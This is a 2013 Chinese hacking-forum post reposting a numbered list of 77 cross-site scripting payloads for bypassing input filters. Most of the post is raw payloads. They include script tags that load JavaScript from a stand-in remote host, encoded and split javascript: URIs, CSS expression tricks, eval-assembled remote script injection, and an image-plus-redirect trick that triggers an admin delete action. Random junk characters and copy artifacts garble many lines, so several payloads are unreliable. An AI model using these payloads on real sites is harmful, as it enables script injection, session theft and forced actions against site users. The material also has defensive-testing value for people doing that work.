找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2874|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。) g5 j* F- p. N& |8 n& ?% x, c6 `" z& i
(1)普通的XSS JavaScript注入3 \5 J% ~3 O7 L0 S7 s% M. ^+ P4 }
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 b0 Z* y) ~& Y; J. ?1 ^. F
(2)IMG标签XSS使用JavaScript命令' I' h9 U5 R+ E1 V0 V( B& _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 V, j% N% \+ q8 s% z" X$ o(3)IMG标签无分号无引号
' B* z" ~5 V' L# Y# `1 w<IMG SRC=javascript:alert(‘XSS’)>
, H* M5 w- s, ~) n* w+ i0 Y9 F/ [. n3 ^) U(4)IMG标签大小写不敏感) J( `- N" U* O7 o( J4 E2 ]
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
# ], a. \6 U  R8 ](5)HTML编码(必须有分号)* X# a: z/ \: u+ F
<IMG SRC=javascript:alert(“XSS”)>7 Z( S" V$ I! B$ C6 K4 ^1 T, d
(6)修正缺陷IMG标签
- g+ H# E5 ]" ^* T<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- U6 Y% ]1 ^$ U
! x# s- j& H' f& m4 h7 k% ^
, [' k( c# @. Z' N- i
(7)formCharCode标签(计算器)
$ G2 \# h  @" r2 t) f+ ?<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 V$ m: b% F4 Q8 U3 t- Q
(8)UTF-8的Unicode编码(计算器)
* c& F( Q, I8 X0 l<IMG SRC=jav..省略..S')>
! B, n" `3 a% m( E, |(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 S) X* x1 Z0 U  L+ r" Y: {<IMG SRC=jav..省略..S')>3 d+ T7 N% Q/ A/ n
(10)十六进制编码也是没有分号(计算器)
7 Y0 x$ N. _7 F<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29># F' l/ d  _& a5 l% \2 v
(11)嵌入式标签,将Javascript分开
% S4 i' J: k% @: }<IMG SRC=”jav ascript:alert(‘XSS’);”>) a6 C  O+ a2 y9 u, r/ U$ `
(12)嵌入式编码标签,将Javascript分开
% f  R& }5 D. D<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 k8 X" O7 ]# F/ r(13)嵌入式换行符
2 Q! S, l0 Q% i/ y' \0 \" h<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ G( X2 i9 U: j' f(14)嵌入式回车
5 L* |5 Q" B- }; D<IMG SRC=”jav ascript:alert(‘XSS’);”>- }! m& M! u; q/ p' b& X
(15)嵌入式多行注入JavaScript,这是XSS极端的例子  t' V/ c! R  A1 l( M
<IMG SRC=”javascript:alert(‘XSS‘)”>
4 T0 F$ W, Z9 L2 j1 r$ C% w  d(16)解决限制字符(要求同页面)* E! i" l. R8 m- K- V' V
<script>z=’document.’</script>
, w& `: G& _! \: s<script>z=z+’write(“‘</script>
$ d) U2 x4 G7 v<script>z=z+’<script’</script>
4 h% s5 ^" u# N- x3 w. {<script>z=z+’ src=ht’</script>
, _% s. u+ _/ W. p0 U' H6 c) j9 P& [<script>z=z+’tp://ww’</script>7 g/ n# H* ^- h! g
<script>z=z+’w.shell’</script>5 _; Y5 [+ X, r, J' x* w. N
<script>z=z+’.net/1.’</script>. f2 B+ F& L3 {  V
<script>z=z+’js></sc’</script>* c$ R- k+ J. Z4 @8 A/ L
<script>z=z+’ript>”)’</script>
+ n/ f) s$ ]* I1 P<script>eval_r(z)</script>
* s  K1 l- ^2 ~(17)空字符12-7-1 T00LS - Powered by Discuz! Board
3 f' `7 b: F, i% |6 mhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
* y) ]: W% J; operl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 Y3 H. B. G0 s( k(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& C* [4 [+ d$ T. f( R% s( T/ nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' H% R+ Z, Y* h4 @% @" A2 q(19)Spaces和meta前的IMG标签' ^  c$ d0 z5 i3 @' Q$ i4 ]9 j3 k
<IMG SRC=” javascript:alert(‘XSS’);”>
; w/ h; c( F; R7 @2 b(20)Non-alpha-non-digit XSS
. k/ k" n3 W; ^% j: W1 G+ H<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ X6 ~+ \! q3 f, o4 A(21)Non-alpha-non-digit XSS to 2) c: J8 A) F3 W# D4 O( G# P( v2 S6 T" N
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>8 Z  r: K% O" D: I  H
(22)Non-alpha-non-digit XSS to 3
5 n) q4 C3 }5 a: V, ~7 q+ h: s<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 S' ^6 L' H* {6 Q
(23)双开括号
0 u- X1 P1 Y8 {, m# z  {<<SCRIPT>alert(“XSS”);//<</SCRIPT>
! u+ D' L* z, r; u' f(24)无结束脚本标记(仅火狐等浏览器)
! A0 u3 p( m. y: d<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
  l2 i1 i% r# ?& ]8 W( D8 x(25)无结束脚本标记2
3 m- C/ @* G0 q" o* P<SCRIPT SRC=//3w.org/XSS/xss.js>& K% ?. N1 C4 `* L4 a  K3 O! [- Z
(26)半开的HTML/JavaScript XSS7 \. ]  F1 k3 X* s  w
<IMG SRC=”javascript:alert(‘XSS’)”; b7 S3 E  Q& {9 T' v  p9 Q: _
(27)双开角括号
$ s' `) \. E, G( ?<iframe src=http://3w.org/XSS.html <6 A+ x9 |9 B; [  k, R5 ~+ _1 l; N
(28)无单引号 双引号 分号
7 ~8 c, }/ v6 q9 o<SCRIPT>a=/XSS/2 n# Q+ C% K4 G- K& O1 n
alert(a.source)</SCRIPT>
& @3 ^& ^7 \7 ?  j2 Y(29)换码过滤的JavaScript
2 m& v. W; ?& O\”;alert(‘XSS’);//$ Z1 N1 `% q5 u
(30)结束Title标签
" e2 C6 Q8 O% v+ h3 t& ?, z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 N% E% \; E. w7 r% h
(31)Input Image
0 v7 {6 s% O$ x<INPUT SRC=”javascript:alert(‘XSS’);”>
* a4 K. s/ w- z% K9 t% m* [, x. u: e(32)BODY Image+ H4 i' i& C: t( U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' n9 ?  o& F4 v3 f+ ~
(33)BODY标签- v6 ^3 P( h" V
<BODY(‘XSS’)>  U6 J3 G: M# C
(34)IMG Dynsrc; S3 o: V- }( M& [+ {6 y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>: `; I/ Z' M7 T+ d4 E
(35)IMG Lowsrc
+ a: r2 q; c, g# W- Y7 S; v<IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 c2 r, S2 O, b9 |7 o(36)BGSOUND- A  B. A" ^3 o& l, c
<BGSOUND SRC=”javascript:alert(‘XSS’);”>1 J; H/ `5 p  Q4 P% D  b3 a
(37)STYLE sheet
9 n; _  ^- `/ p! p<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- v2 T+ [. j# H(38)远程样式表
; ]* l( C- V* ^6 A: M! g/ T<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 i8 Q) |0 ~/ ]4 m" o+ Q
(39)List-style-image(列表式)) O2 h/ I6 f- ^/ m8 X
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ ^$ t3 |& O# K8 I! k( Q6 A(40)IMG VBscript+ _4 d0 i! L( V1 \
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
, ~1 Q+ d5 C+ e) q0 C2 l(41)META链接url9 L, {+ n9 z7 x0 J- ?. I
4 t& u; W% u* y0 k" W
8 a; s* v5 d1 R( D. n
<META HTTP-EQUIV=”refresh” CONTENT=”0;4 y' B: B! P, f8 d3 J
URL=http://;URL=javascript:alert(‘XSS’);”>4 `7 @2 a. F) M- S+ _% S
(42)Iframe4 T; p0 B4 [4 ~6 Y( O% A: R/ f0 p. e" b
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>+ G5 D  ~5 L, R' m
(43)Frame
& s! @9 n- x0 T8 O0 i+ U<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board; v: ]* h6 z& y) n- h1 i( j( V  v
https://www.t00ls.net/viewthread ... table&tid=15267 3/69 x# J' Q7 W3 Q( w, _/ t
(44)Table
( {( O" h' X5 r) o) b<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>2 o, \% r. f% p( M+ p' W
(45)TD
! F% a6 t9 R5 A" f4 n# A: R! U0 z: e<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* w0 B- x6 s& z, w
(46)DIV background-image; o$ [  ^5 V- U& a& i/ a
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>; P/ }$ K. W1 n
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
( Z3 [% O. {8 f5 x8&13&12288&65279), {! y/ i( I/ {) }3 Z) ^. V2 L4 z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>- K+ t9 G: N' t! o& c  m
(48)DIV expression
  `% y/ v- P! H  c# Z' \$ i, h. J<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& ], j) S+ Q  j2 R- ~(49)STYLE属性分拆表达) @8 |, [5 s$ Z3 R% @2 ^% Y8 t8 |& b
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) P% b$ D2 ?7 ?+ D(50)匿名STYLE(组成:开角号和一个字母开头)
- ~8 M8 g& Q3 ?% m1 Q<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' @1 X8 P" W* C
(51)STYLE background-image# R4 G! }7 M- [8 |% g; {$ H( c
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A) Z/ f1 R% I! y/ n  _$ g3 ^$ E
CLASS=XSS></A>
9 \" t- j9 e4 s/ j: ]6 c(52)IMG STYLE方式
3 p! U; g  ]' l9 R. }9 n% O2 Hexppression(alert(“XSS”))’>! }( H" V' p8 M6 K
(53)STYLE background
) Y' _% x4 B3 _& b<STYLE><STYLE0 f7 r7 K$ \( @
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 R6 O/ [; _1 Q( {2 b( Z
(54)BASE8 ^2 J/ U2 V& L& c
<BASE HREF=”javascript:alert(‘XSS’);//”>6 y1 ?1 `: u; y9 O+ y
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS7 R" R2 L+ [3 ~& l. T
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>$ d$ j8 X" T' Z7 i
(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 K8 F$ Y' @, s/ e* i3 p# `# Ma=”get”;
' j4 o; n$ [$ C2 Rb=”URL(\”";
9 a- A  a4 R6 K$ s3 R0 ic=”javascript:”;
" L. I3 @% P7 E8 G9 {# H: }d=”alert(‘XSS’);\”)”;- M! u! f& e2 p2 I( }2 x; S0 i
eval_r(a+b+c+d);
! K* M2 m& |6 y# w  F% o(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 J0 w, S' b) d$ Y8 T* V* ^<HTML xmlns:xss>
4 d$ r: ~8 {& d8 t/ [8 S" h7 P: i( L<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
+ L) [: s+ Q1 k<xss:xss>XSS</xss:xss>
* o$ h& s: F* v2 U. f+ J2 f</HTML>
9 |: i4 q7 @) h(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
8 f! d9 j8 P9 G- j  B8 O/ F<SCRIPT SRC=””></SCRIPT>7 \1 B4 Y  Q' W' {7 N- m
(59)IMG嵌入式命令,可执行任意命令4 w8 n5 M' v+ R% n
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
% i! C/ i, C% _/ \; m# @(60)IMG嵌入式命令(a.jpg在同服务器)3 y" m( P9 P! Y$ n. m; x  [
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser" t6 \6 \9 e) Z& z+ g! z
(61)绕符号过滤
( q/ R, @: z; b  i3 w6 V( r' [<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
  ^$ o+ J5 U' @(62)
! k9 M5 b* F1 B2 }0 p4 p6 o<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>6 `/ M" q" `- D# F6 [9 r( `5 Z3 h
(63)
$ V6 P) Q9 |1 K" e+ g7 @7 h<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
2 w9 N: M! E2 M! P(64)+ D' s5 S5 ]( D0 Y, f( F
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
" q' C- L: ?8 N) p/ }8 j- N(65)/ @+ Q- R+ k1 U3 b, L* b
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( R6 g* d  @% @* k% [(66)12-7-1 T00LS - Powered by Discuz! Board
; u2 A. }) `6 ghttps://www.t00ls.net/viewthread ... table&tid=15267 4/62 _5 `: f# `% K+ ~
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( e7 B: o0 k9 X, K, x8 ~! s
(67): B" @$ x7 G2 u, }! P; t8 F
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>6 G$ U4 D4 U, }& G
</SCRIPT>" q9 ?5 j$ u0 l2 C3 p' |7 G) O- b
(68)URL绕行
! [- |+ ~# T+ L6 B/ |<A HREF=”http://127.0.0.1/”>XSS</A>7 ?1 e) Q9 y3 P: S2 I( e% b5 o
(69)URL编码4 w1 w# ]$ `" F  l8 H
<A HREF=”http://3w.org”>XSS</A>
/ t' F% e; [8 T(70)IP十进制
+ k0 H/ ~: L) Z* h( i; w  t<A HREF=”http://3232235521″>XSS</A>
! u9 v3 z$ U5 w  g! \(71)IP十六进制7 B) c, w) |% z: \4 w0 x" a
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 }  t# v8 C7 n+ H5 Y
(72)IP八进制
  [$ w; g. t, Y5 t5 N. A! }<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ Y( ]# o1 C! l- }(73)混合编码
5 L3 Y* ]9 o5 [" W0 N<A HREF=”h2 G* d+ c, T8 \
tt p://6 6.000146.0×7.147/”">XSS</A>0 X: M9 ?* D- k9 ]- \
(74)节省[http:]$ u/ E" [" \% I
<A HREF=”//www.google.com/”>XSS</A>
, [8 R5 [( E8 H- x(75)节省[www]
- f1 [) `6 d+ L  G2 f* p<A HREF=”http://google.com/”>XSS</A>
" e8 s; I. |2 k(76)绝对点绝对DNS
. V7 A9 R: Z0 M" g3 H% d, ^<A HREF=”http://www.google.com./”>XSS</A>. h- A3 l/ J6 `+ o+ ~
(77)javascript链接7 _: `, x* N; r7 h: P8 A" T
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>8 L9 [3 L' U- k1 `
  W; t4 r) U6 Z; v5 h
原文地址:http://fuzzexp.org/u/0day/?p=14/ l0 ?* E- L4 I; H6 \9 _
3 Y. z! G' c' k* U, _2 j2 y9 e6 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表